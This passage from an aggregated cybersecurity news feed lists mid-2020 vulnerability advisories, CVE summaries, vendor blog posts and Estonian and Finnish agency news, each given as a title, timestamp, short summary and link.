https://ria.ee/uudised/august-moodus-eesti-kuberruumis-pahavara-sisaldavate-dokumentide-ja-e-kirjade-tahe-all
Security Alert (A20-09-05): Multiple Vulnerabilities in Citrix Products
2020-09-18T04:00:00Z | 1600401600

Multiple vulnerabilities have been found in Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-09-03): Multiple Vulnerabilities in Apple iOS and iPadOS
2020-09-17T04:00:00Z | 1600315200

Apple has released iOS 14 and iPadOS 14 to fix multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-09-04): Multiple Vulnerabilities in Drupal
2020-09-17T04:00:00Z | 1600315200

Drupal has released security advisories to address multiple vulnerabilities in Drupal Core.

https://www.govcert.gov.hk/en/alerts_detail.php
UK condemns Chinese cyber attacks against governments and businesses
2020-09-16T17:01:23Z | 1600275683

The UK has today joined international allies to call out malicious cyber activity carried out by China.

https://www.ncsc.gov.uk/news/uk-condemns-chinese-cyber-attacks-against-businesses-governments
The leaky pipe of secure coding
2020-09-16T15:54:24Z | 1600271664

Helen L discusses how security can be woven more seamlessly into the development process.

https://www.ncsc.gov.uk/blog-post/leaky-pipe-secure-coding
Bekijk hoe Alewijnse zijn wereldwijde WAN heeft getransformeerd met Cato Secure SD-WAN
2020-09-16T12:04:00Z | 1600257840

The post Bekijk hoe Alewijnse zijn wereldwijde WAN heeft getransformeerd met Cato Secure SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/resources/bekijk-hoe-alewijnse-zijn-wereldwijde-wan-heeft-getransformeerd-met-cato-secure-sd-wan/
Headwinds and Tailwinds - Cycling For Climate Awareness in a Global Pandemic
2020-09-15T04:00:00Z | 1600142400

If you told me at the beginning of 2020 that I'd be cycling 250 miles in the remote Upper Peninsula of Michigan, fundraising for an organization called "Climate Ride", and wearing a face mask to go grocery shopping - I would not have believed you. Yet, since March 2020, we've all been living the reality of the Covid-19 pandemic. Social distancing, total lock-down for some, living and working from home, and dealing with a narrowed life experience.

https://www.akamai.com/blog/culture/headwinds-and-tailwinds-cycling-for-climate-awareness-in-a-global-pandemic
Nitro Pro PDF Object Stream Parsing Number of Objects Remote Code Execution Vulnerability
2020-09-15T00:00:00Z | 1600128000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1063
Nitro Pro PDF JPEG2000 Stripe Sub-sample Decoding Out-of-bounds Write Code Execution Vulnerability
2020-09-15T00:00:00Z | 1600128000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1062
Nitro Pro Indexed ColorSpace Rendering Code Execution Vulnerability
2020-09-15T00:00:00Z | 1600128000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1070
Nitro Pro XRefTable Entry Missing Object Code Execution Vulnerability
2020-09-15T00:00:00Z | 1600128000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1068
Nitro Pro PDF ICCBased ColorSpace Stroke Color Code Execution Vulnerability
2020-09-15T00:00:00Z | 1600128000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1084
Why I Hate Multivendor SASE
2020-09-14T06:34:51Z | 1600065291

Of late, there’s talk about using multiple vendors to deliver a SASE solution. One would provide the SD-WAN and security, another the global private backbone, and perhaps a third-will deliver remote access. But is that what SASE is all about? As the article points out, Gartner analysts defined SASE as a single, vendor cloud-native platform.... The post Why I Hate Multivendor SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-i-hate-multivendor-sase/
Riigi Infosüsteemi Amet tuli välja kasutajasõbralikuma id.ee portaaliga
2020-09-14T04:00:00Z | 1600056000

Riigi Infosüsteemi Amet (RIA) muutis id.ee portaali kasutajasõbralikumaks, et julgustada inimesi kasutama rohkem riigi e-teenuseid.

https://ria.ee/uudised/riigi-infosusteemi-amet-tuli-valja-kasutajasobralikuma-idee-portaaliga
Google Chrome PDFium Javascript Active Document Memory Corruption Vulnerability
2020-09-14T00:00:00Z | 1600041600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1092
#hackers.si – who are they?
2020-09-11T07:35:26Z | 1599809726

#hackers.si is documentary film that depicts one aspect of the hacking scene in Slovenia and its evolution in the last 20 years. Who are hackers and what drives them? The … The post #hackers.si – who are they? appeared first on SI CERT.

https://www.cert.si/en/hackers-si-who-are-they/
Unprecedented Levels of Ransom DDoS Extortion Attacks
2020-09-11T04:00:00Z | 1599796800

The FBI has released a flash warning that thousands of organizations around the world, and across multiple industries, have been threatened with DDoS attacks unless they pay a bitcoin ransom. This ransom DDoS, or RDoS, threat was covered by Akamai's Security Intelligence Response Team (SIRT) in a Security Alert released on August 17, 2020.

https://www.akamai.com/blog/trends/unprecedented-levels-of-ransom-ddos-extortion-attacks
When Hackers Take Advantage of Your Trusted Vendors
2020-09-11T04:00:00Z | 1599796800

As JavaScript-based client-side attacks continue to evolve, we see how attackers are getting more sophisticated and employing more advanced techniques. Unfortunately, it has been proven many times that any website partner can be exploited to carry out an attack. In the past month, we witnessed one of the most popular and trusted vendors being used as a credit card data exfiltration vector -- Google Analytics.

https://www.akamai.com/blog/security/when-hackers-take-advantage-of-your-trusted-vendors
Eesti ettevõtted kaotavad aastas küberrünnakutele üle miljoni euro
2020-09-11T03:57:47Z | 1599796667

Eesti ettevõtted kaotavad küberkurjategijatele aastas rohkem kui miljon eurot. Tegemist on üksnes jäämäe veepealse osaga ehk summaga, millest teavitatakse Riigi Infosüsteemi Ametit (RIA). Ettevõtete rahakoti kaitsmiseks on oluline suurendada teadlikkust küberohtudest ja võimalustest oma firmat paremini kaitsta.

https://ria.ee/uudised/eesti-ettevotted-kaotavad-aastas-kuberrunnakutele-ule-miljoni-euro
You Need Deception Technology. And It’s Not Why You Think
2020-09-10T15:49:12Z | 1599752952

Deception technology is a different way of thinking about cybersecurity. Without it, attackers have the advantage. You can take that advantage back.

https://www.smokescreen.io/you-need-deception-technology/
Security Alert (A20-09-02): Multiple Vulnerabilities in Palo Alto PAN-OS
2020-09-10T04:00:00Z | 1599710400

Palo Alto has published security advisories to address multiple vulnerabilities in PAN-OS.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-09-01): Multiple Vulnerabilities in Microsoft Products (September 2020)
2020-09-09T04:00:00Z | 1599624000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Web Application and API Protection: From SQL Injection to Magecart
2020-09-09T04:00:00Z | 1599624000

SQL injections were first discovered in 1998, and over 20 years later, they remain an unsolved challenge and an ongoing threat for every web application and API. The Open Web Application Security Project (OWASP) highlighted injection flaws in its Top 10 lists for both web application security risks and API security threats.

https://www.akamai.com/blog/security/web-application-and-api-protection-from-sql-injection-to-magecart
CVE-2020-14509
2020-09-09T00:00:00Z | 1599609600

BUFFER ACCESS WITH INCORRECT LENGTH VALUE CWE-805 Multiple memory corruption vulnerabilities exist where the packet parser mechanism does not verify length fields. An attacker could send specially crafted packets to exploit these vulnerabilities.Read more: Far-Reaching Third-Party Components Putting OT Networks at Risk

https://claroty.com/team82/disclosure-dashboard/cve-2020-14509cve-2020-14517cve-2020-14519cve-2020-14515cve-2020-14513cve-2020-16233
SonicWall SSL-VPN Products security misconfiguration leads to possible domain name collision vulnerability
2020-09-08T07:12:25Z | 1599549145

SonicWall SSL-VPN products web interface has the option to publicly display their organization’s internal domain names in the Domain drop-down menu. An attacker with knowledge of an organization’s internal domain name can potentially take advantage of a DNS flaw known as domain name collision.A domain name collision occurs when an attempt to resolve a name used in a private namespace (e.g. under a non-delegated Top-Level Domain, or a short, unqualified name) results in a query to the public Domain Name System (DNS). When the administrative boundaries of private and public namespaces overlap, name resolution may yield unintended or harmful results. For example, if the organization’s internal domain has a valid Top-Level Domain and is not already publicly registered, an attacker can register the domain publicly, and use the public domain to receive DNS requests that were intended for the internal domain. This gives an attacker the ability to poison the organization’s DNS requests and remotely capture hashes from the organization. CVE: N/A Last updated: Sept. 8, 2020, 7:12 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0006
Every Application Should Be Behind a WAF
2020-09-08T04:00:00Z | 1599537600

It's no secret that security threats continue to expand in volume and variety, making headlines on virtually a daily basis. From nation-state attacks, corporate espionage, and data exfiltration campaigns to all-in-one and sneaker bot campaigns, businesses across the globe find themselves dealing with a deluge of inbound threats. The increased amount and variation of threats, and the proliferation of apps being deployed and managed by teams and individuals across the enterprise, can make securing apps and data feel like trying to keep water out of a submerged sieve.

https://www.akamai.com/blog/security/every-application-should-be-behind-a-waf
Microsoft Windows 10 CLFS.sys ValidateRegionBlocks privilege escalation vulnerability
2020-09-08T00:00:00Z | 1599523200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1098
CVE-2020-7532
2020-09-08T00:00:00Z | 1599523200

DESERIALIZATION OF UNTRUSTED DATA CWE-502A vulnerability exists in SCADAPack x70 Security Administrator (V1.2.0 and prior) which could allow arbitrary code execution when an attacker builds a custom .SDB file containing a malicious serialized buffer.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7532
CVE-2020-7531
2020-09-08T00:00:00Z | 1599523200

IMPROPER ACCESS CONTROL CWE-284A vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place executables in a specific folder and run code whenever RemoteConnect is executed by the user.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7531
CVE-2020-7530
2020-09-08T00:00:00Z | 1599523200

IMPROPER AUTHORIZATION CWE-285A vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows improper access to executable code folders.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7530
CVE-2020-7529
2020-09-08T00:00:00Z | 1599523200

IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('Path Transversal') CWE-22A vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place content in any unprotected folder on the target system using a crafted .RCZ file.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7529
CVE-2020-7528
2020-09-08T00:00:00Z | 1599523200

DESERIALIZATION OF UNTRUSTED DATA CWE-502A vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which could allow arbitrary code execution when an attacker builds a custom .PRJ file containing a malicious serialized buffer.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7528cve-2020-7529cve-2020-7530cve-2020-7531cve-2020-7532
CVE-2020-16233
2020-09-08T00:00:00Z | 1599523200

IMPROPER RESOURCE SHUTDOWN OR RELEASE CWE-404 An attacker could send a specially crafted packet that could have the server send back packets containing data from the heap.Read more: Far -Reaching Third-Party Components Putting OT Networks at Risk

https://claroty.com/team82/disclosure-dashboard/cve-2020-16233
CVE-2020-14519
2020-09-08T00:00:00Z | 1599523200

ORIGIN VALIDATION ERROR CWE-346 This vulnerability allows an attacker to use the internal WebSockets API via a specifically crafted Java Script payload, which may allow alteration or creation of license files when combined with CVE-2020-14515.Read more: Far -Reaching Third-Party Components Putting OT Networks at Risk

https://claroty.com/team82/disclosure-dashboard/cve-2020-14519
CVE-2020-14517
2020-09-08T00:00:00Z | 1599523200

INADEQUATE ENCRYPTION STRENGTH CWE-326 Protocol encryption can be easily broken and the server accepts external connections, which may allow an attacker to remotely communicate with the CodeMeter API.Read more: Far -Reaching Third-Party Components Putting OT Networks at Risk

https://claroty.com/team82/disclosure-dashboard/cve-2020-14517
CVE-2020-14515
2020-09-08T00:00:00Z | 1599523200

IMPROPER VERIFICATION OF CRYPTOGRAPHIC SIGNATURE CWE-347 There is an issue in the license-file signature checking mechanism, which allows attackers to build arbitrary license files, including forging a valid license file as if it were a valid license file of an existing vendor. Only CmActLicense update files with CmActLicense Firm Code are affected.Read more: Far -Reaching Third-Party Components Putting OT Networks at Risk

https://claroty.com/team82/disclosure-dashboard/cve-2020-14515
CVE-2020-14513
2020-09-08T00:00:00Z | 1599523200

IMPROPER INPUT VALIDATION CWE-20 CodeMeter and the software using it may crash while processing a specifically crafted license file due to unverified length fields.Read more: Far -Reaching Third-Party Components Putting OT Networks at Risk

https://claroty.com/team82/disclosure-dashboard/cve-2020-14513
What is Zero Trust Architecture?
2020-09-07T07:40:56Z | 1599464456

Zero trust has become one of the hottest buzzwords in network security. However, with all the hype, it can become difficult to separate the marketing fluff from the real value. Fortunately, unlike many buzzwords, there is plenty of substance around zero trust. So, what exactly is the substance behind zero trust and how can you... The post What is Zero Trust Architecture? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-zero-trust-architecture/
RIA DigiDoci äpis saab nüüd digiallkirjastada ka Smart-IDga
2020-09-03T10:32:52Z | 1599129172

Digiallkirjade andmiseks mõeldud Riigi Infosüsteemi Ameti (RIA) mobiilirakenduse uues versioonis saab dokumente allkirjastada ka Smart-IDga.

https://ria.ee/uudised/ria-digidoci-apis-saab-nuud-digiallkirjastada-ka-smart-idga
Metrics That Matter: Continuous Performance Optimization
2020-09-02T07:00:00Z | 1599030000

To attract and retain customers, you must offer an exceptional digital experience. In an increasingly competitive business climate, organizations are fighting to maintain loyalty and keep users engaged online. The cost of switching is low, consumers are transient, and user expectations for how digital experiences should perform have never been higher.

https://www.akamai.com/blog/performance/metrics-that-matter-continuous-performance-optimization
UK joins international allies in issuing cyber defence advice for organisations
2020-09-01T12:27:47Z | 1598963267

Cyber security advisory highlights technical approaches for uncovering and dealing with malicious activity.

https://www.ncsc.gov.uk/news/uk-joins-international-allies-in-issuing-cyber-defence-advice-for-organisations
The Most Important Patch You’ll Never Have to Deploy
2020-09-01T05:07:25Z | 1598936845

Applying patches to software in networking devices is so common that most enterprises have a structured procedure on how to do it. The procedure details things like how to monitor for the availability of necessary patches, how often to apply fixes to devices, how to test patches before applying them, and when to apply the... The post The Most Important Patch You’ll Never Have to Deploy appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-most-important-patch-youll-never-have-to-deploy/
Women's Foundation of Boston Empowerment Webinar for Girls and Young Women
2020-09-01T04:00:00Z | 1598932800

Akamai is thrilled to have been the lead sponsor for the recent Women's Foundation of Boston Empowerment Webinar for Girls and Young Women: Girl Decoded: An Intimate Conversation with Author Rana el Kaliouby about finding your voice, pursuing education and excelling as a woman in STEM.

https://www.akamai.com/blog/culture/womens-foundation-of-boston-empowerment-webinar-for-girls-and-young-women
Accusoft ImageGear DICOM parse_dicom_meta_info code execution vulnerability
2020-09-01T00:00:00Z | 1598918400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1096
Accusoft ImageGear TIFF handle_COMPRESSION_PACKBITS memory corruption vulnerability
2020-09-01T00:00:00Z | 1598918400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1095
Firsthand Perspectives from 5 Manufacturing IT Leaders about their SASE Experience
2020-08-31T09:09:20Z | 1598864960

The post Firsthand Perspectives from 5 Manufacturing IT Leaders about their SASE Experience appeared first on Cato Networks.

https://www.catonetworks.com/resources/firsthand-perspectives-from-5-manufacturing-it-leaders-about-their-sase-experience/
The (Nearly) 10 Biggest Mistakes I’ve Seen Manufacturers Make When Evaluating SD-WAN
2020-08-31T06:50:39Z | 1598856639

The post The (Nearly) 10 Biggest Mistakes I’ve Seen Manufacturers Make When Evaluating SD-WAN appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-32
RingCentral Talks SD-WAN, SASE, and Digital Transformation
2020-08-31T06:45:49Z | 1598856349

The post RingCentral Talks SD-WAN, SASE, and Digital Transformation appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-29
High Threat Security Alert (A20-08-09): Vulnerability in Cisco Products
2020-08-31T04:00:00Z | 1598846400

Cisco released a security advisory to address a vulnerability in Cisco IOS XR software.

https://www.govcert.gov.hk/en/alerts_detail.php
OS4Ed openSIS Modules.php remote code execution vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1082
OS4Ed openSIS CheckDuplicateStudent.php page SQL injection vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1072
OS4Ed openSIS login SQL injection vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1081
OS4Ed openSIS GetSchool.php SQL injection Vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1074
OS4Ed openSIS install remote code execution vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1083
OS4Ed openSIS id parameter multiple SQL injection vulnerabilities
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1077
OS4Ed openSIS Password Reset Multiple SQL injection vulnerabilities
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1080
OS4Ed openSIS course_period_id parameter multiple SQL injection vulnerabilities
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1076
OS4Ed openSIS CoursePeriodModal.php page multiple SQL injection vulnerabilities
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1075
OS4Ed openSIS email parameter SQL injection vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1073
OS4Ed openSIS DownloadWindow.php SQL injection vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1079
OS4Ed openSIS Validator.php SQL injection vulnerability
2020-08-31T00:00:00Z | 1598832000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1078
NVIDIA D3D10 driver nvwgf2umx_cfg.dll nvwg MOV2 code execution vulnerability
2020-08-30T00:00:00Z | 1598745600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1036
Graphtage: A New Semantic Diffing Tool
2020-08-28T11:00:27Z | 1598612427

Graphtage is a command line utility and underlying library for semantically comparing and merging tree-like structures such as JSON, JSON5, XML, HTML, YAML, and TOML files. Its name is a portmanteau of “graph” and “graftage” (i.e., the horticultural practice of joining two trees together so they grow as one). Read on for what Graphtage does differently and better, why we developed it, how it works, and directions for using it as a library.

https://blog.trailofbits.com/2020/08/28/graphtage/
Security Alert (A20-08-07): Multiple Vulnerabilities in Cisco Products
2020-08-27T04:00:00Z | 1598500800

Cisco released 7 security advisories to address vulnerabilities in Cisco products running FXOS and NX-OS as well as those in Cisco Nexus 3000 and 9000 series switches.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-08-08): Multiple Vulnerabilities in Pulse Secure Products
2020-08-27T04:00:00Z | 1598500800

Pulse Secure released security advisories to address multiple vulnerabilities in the Pulse Connect Secure and Pulse Policy Secure server software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-08-06): Multiple Vulnerabilities in Firefox
2020-08-26T04:00:00Z | 1598414400

Mozilla has published three security advisories (MFSA 2020-36, MFSA 2020-37 and MFSA 2020-38) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Becoming a Comms and Analyst Relations Leader, Rita Aspen - Head, Communications & Analyst Relations, APJ
2020-08-26T04:00:00Z | 1598414400

My parents were first-generation immigrants from India. They worked hard, made Singapore their home and took all and any challenges head on. They have always lived by the simple philosophy, 'to be the change'. It's a philosophy that I try to live too, and in many ways it's what attracted me to Akamai not too long ago.

https://www.akamai.com/blog/culture/becoming-a-comms-and-analyst-relations-leader-rita-aspen-head-communications
atftpd daemon Denial of Service Vulnerability
2020-08-26T00:00:00Z | 1598400000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1029
Insecure Direct Object Reference vulnerability in the mysonicwall.com add-user API
2020-08-25T19:30:16Z | 1598383816

An insecure direct object reference vulnerability has been identified in the users/add-user API endpoint of mysonicwall.com. This could allow a normal authenticated mysonicwall user to manipulate API parameter and gain access to user group of tenant of any other mysonicwall user account. CVE: N/A Last updated: Aug. 26, 2020, 9:20 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0005
Mitmed Eesti veebilehed ei kontrollinud autentimisel sertifikaatide kehtivust
2020-08-24T21:00:00Z | 1598302800

Riigi Infosüsteemi Amet registreeris juulis 171 küberintsidenti. CERT-EE tuvastas seire käigus paarkümmend veebilehte, mis ei kontrollinud ID-kaardiga autentides, kas sertifikaadid kehtivad ning kaks veebilehte ei kontrollinud, kas sertifikaat on üldse ametlik. Seeviisi oli teoorias võimalik mõnda portaali sisse logida teise isikuna.

https://ria.ee/uudised/mitmed-eesti-veebilehed-ei-kontrollinud-autentimisel-sertifikaatide-kehtivust
Microsoft Azure Sphere Capability access control privilege escalation vulnerability
2020-08-24T00:00:00Z | 1598227200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1133
Google Chrome WebGL code execution vulnerability
2020-08-24T00:00:00Z | 1598227200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1085
Microsoft Azure Sphere uid_map UID uniqueness privilege escalation vulnerability
2020-08-24T00:00:00Z | 1598227200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1137
Microsoft Azure Sphere Normal World application READ_IMPLIES_EXEC personality unsigned code execution vulnerability
2020-08-24T00:00:00Z | 1598227200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1128
Microsoft Azure Sphere Normal World application /proc/thread-self/mem unsigned code execution vulnerability
2020-08-24T00:00:00Z | 1598227200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1138
A Modern Approach to Enterprise Remote Access
2020-08-23T19:57:52Z | 1598212672

Remote work has become the new normal as a result of the COVID-19 pandemic, and according to a survey by collaboration software provider Slack, most knowledge workers believe remote-work-friendly policies will continue after the pandemic as well. At the same time this unprecedented shift to remote work is occurring, businesses are realizing traditional enterprise remote... The post A Modern Approach to Enterprise Remote Access appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-modern-approach-to-enterprise-remote-access/
Security Alert (A20-08-05): Multiple Vulnerabilities in ISC BIND
2020-08-21T04:00:00Z | 1597982400

ISC has released security updates to fix multiple security vulnerabilities in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
Internet Systems Consortium's BIND TCP Receive Buffer Length Assertion Check Denial of Service Vulnerability
2020-08-20T00:00:00Z | 1597881600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1100
Malware and vulnerabilities dominated the July cyber weather
2020-08-19T11:37:29Z | 1597837049

Several extensive ransomware targeted at both large and small enterprises in Finland and in other countries gained attention in July. A great number of vulnerabilities were also found. Vulnerabilities are exploited rapidly in targeted attacks, which is why it is important to install updates quickly also during summer. In addition, the EU has taken the first ever active counter-measures concerning cyber attacks directed against the EU member states and imposed sanctions against six individuals and three entities.

https://www.kyberturvallisuuskeskus.fi/en/news/malware-and-vulnerabilities-dominated-july-cyber-weather
Malware and vulnerabilities dominated the July cyber weather
2020-08-19T11:37:29Z | 1597837049

Several extensive ransomware targeted at both large and small enterprises in Finland and in other countries gained attention in July. A great number of vulnerabilities were also found. Vulnerabilities are exploited rapidly in targeted attacks, which is why it is important to install updates quickly also during summer. In addition, the EU has taken the first ever active counter-measures concerning cyber attacks directed against the EU member states and imposed sanctions against six individuals and three entities.

https://www.kyberturvallisuuskeskus.fi/en/news/malware-and-vulnerabilities-dominated-july-cyber-weather
Eestisse jõudis pahavaravõrgustiku Emotet uus laine
2020-08-19T09:08:06Z | 1597828086

Viimaste nädalate jooksul anti Riigi Infosüsteemi Ameti küberintsidentide käsitlemise osakonnale (CERT-EE-le) märku mitmest Emoteti pahavaravõrgustikuga nakatumisest Eestis. Teistele pahavaraperekondadele teenust pakkuv Emotet risustab küberruumi juba aastaid, juulis aktiveeriti võrgustik taas ning selle kaudu otsitakse ohvreid üle maailma.

https://ria.ee/uudised/eestisse-joudis-pahavaravorgustiku-emotet-uus-laine
How Criminals Attack the Games Industry
2020-08-19T07:00:00Z | 1597820400

If you work in the video games industry, it's already obvious that security is a challenge, and criminals are a threat. But how much do you know about how the criminal economy works? What actually motivates them? What specific methods do they use? And how do they interact with one another?

https://www.akamai.com/blog/security/how-criminals-attack-the-games-industry
Emotet malware actively spread in Finland
2020-08-19T06:59:11Z | 1597820351

Emotet is a malware spread via email in the name of Finnish organisations. The objective of the malware attack is to steal information from organisations, infiltrate a targeted network and in some cases to launch a ransomware attack. The attack campaign has been active since August 17th 2020.

https://www.kyberturvallisuuskeskus.fi/en/emotet-malware-actively-spread-finland
ERPNext frappe.desk.reportview.get SQL injection vulnerability
2020-08-18T00:00:00Z | 1597708800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1091
SASE Convergence or Integration? It’s Not the Same Thing
2020-08-17T22:00:42Z | 1597701642

Networking and security used to be considered two distinct areas of information technology. Enterprises would build a network to meet their communication needs and then bolt on security to protect data and devices. The widespread adoption of Gartner’s secure access service edge (SASE) architecture all but debunked that notion, and today it’s widely accepted that... The post SASE Convergence or Integration? It’s Not the Same Thing appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-convergence-or-integration-its-not-the-same-thing/
Using Echidna to test a smart contract library
2020-08-17T11:00:17Z | 1597662017

In this post, we’ll show you how to test your smart contracts with the Echidna fuzzer. In particular, you’ll see how to: Find a bug we discovered during the Set Protocol audit using a variation of differential fuzzing, and Specify and check useful properties for your own smart contract libraries. And we’ll demonstrate how to […]

https://blog.trailofbits.com/2020/08/17/using-echidna-to-test-a-smart-contract-library/
RIA analüüsi tulemusel selgub, kuidas võiks tulevikus riigiga juturoboti abil suhelda
2020-08-17T06:32:18Z | 1597645938

Riigi Infosüsteemi Amet (RIA) alustab riigi keskse juturoboti tehnilist eelanalüüsi, et parandada riigi klientide jaoks asutuste vahelise teeninduse kiirust ja mugavust. Analüüsi käigus selgub, kas taoline juturobotilahendus on teostatav, funktsionaalne ja jätkusuutlik.

https://ria.ee/uudised/ria-analuusi-tulemusel-selgub-kuidas-voiks-tulevikus-riigiga-juturoboti-abil-suhelda
Security Alert (A20-08-04): Multiple Vulnerabilities in Apache HTTP Server
2020-08-17T04:00:00Z | 1597636800

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules, including mod_proxy_uwsgi and mod_http2.

https://www.govcert.gov.hk/en/alerts_detail.php
Ransom Demands Return: New DDoS Extortion Threats From Old Actors Targeting Finance and Retail
2020-08-17T04:00:00Z | 1597636800

Update 08/24/2020 As mentioned below, the Akamai SIRT has been tracking attacks from the so-called Armada Collective and Fancy Bear actors, who are sending ransom letters to various industry verticals such as finance, travel, and e-commerce. In addition to the...

https://www.akamai.com/blog/security/ransom-demands-return-new-ddos-extortion-threats-from-old-actors-targeting-finance-and-retail
Security Alert (A20-08-03): Multiple Vulnerabilities in Apache Struts
2020-08-14T04:00:00Z | 1597377600

Apache has released the security bulletins (S2-059, S2-060) to address the vulnerabilities in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Sinter: New user-mode security enforcement for macOS
2020-08-12T05:41:16Z | 1597210876

TL;DR: Sinter is the first available open-source endpoint protection agent written entirely in Swift, with support for Apple’s new EndpointSecurity API from first principles. Sinter demonstrates how to build a successful event-authorization security agent, and incorporates solutions to many of the challenges that all endpoint protection agents will face as they migrate from kernel-mode to […]

https://blog.trailofbits.com/2020/08/12/sinter-new-user-mode-security-enforcement-for-macos/
High Threat Security Alert (A20-08-01): Multiple Vulnerabilities in Microsoft Products (August 2020)
2020-08-12T04:00:00Z | 1597204800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-08-02): Multiple Vulnerabilities in Adobe Reader/Acrobat
2020-08-12T04:00:00Z | 1597204800

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato overcomes the technical shortcomings undermining Amazon WorkSpaces deployments
2020-08-11T08:10:50Z | 1597133450

Interest in Amazon WorkSpaces, a managed, secure Desktop-as-a-Service solution, continues to grow as enterprises look for ways to reduce costs, simplify their infrastructure, and support remote workers. Companies can use Amazon WorkSpaces to provision Windows or Linux desktops in minutes and quickly scale to meet workers’ needs around the world. The service has been a... The post Cato overcomes the technical shortcomings undermining Amazon WorkSpaces deployments appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-overcomes-the-technical-shortcomings-undermining-amazon-workspaces-deployments/
Riigi Infosüsteemi Amet kutsub ettevõtjaid küberrünnakutest teavitama
2020-08-10T12:00:07Z | 1597060807

Riigi Infosüsteemi Amet (RIA) kutsub ettevõtjaid küberintsidentidest kindlasti teavitama, sest ainult nii on võimalik saada tõepärane ülevaade Eesti küberruumi ohtudest ja leida tõhusaid lahendusi nende maandamiseks.

https://ria.ee/uudised/riigi-infosusteemi-amet-kutsub-ettevotjaid-kuberrunnakutest-teavitama
Tips for using a password manager
2020-08-10T09:25:04Z | 1597051504

Do you need to come up with yet another password for a new service? Do you have trouble remembering long passwords? A password manager is the answer! Take the first step towards safer password management by checking out our tips for using a password manager.

https://www.kyberturvallisuuskeskus.fi/en/news/tips-using-password-manager
Tips for using a password manager
2020-08-10T09:25:04Z | 1597051504

Do you need to come up with yet another password for a new service? Do you have trouble remembering long passwords? A password manager is the answer! Take the first step towards safer password management by checking out our tips for using a password manager.

https://www.kyberturvallisuuskeskus.fi/en/news/tips-using-password-manager
Active ransomware attacks continue
2020-08-10T09:16:56Z | 1597051016

Active ransomware attacks have continued in Finland. A successful ransomware campaign can paralyse organisations that have not prepared adequately. We recommend that you brush up on how ransomware attacks work and how to protect yourself against them.

https://www.kyberturvallisuuskeskus.fi/en/news/active-ransomware-attacks-continue
Active ransomware attacks continue
2020-08-10T09:16:56Z | 1597051016

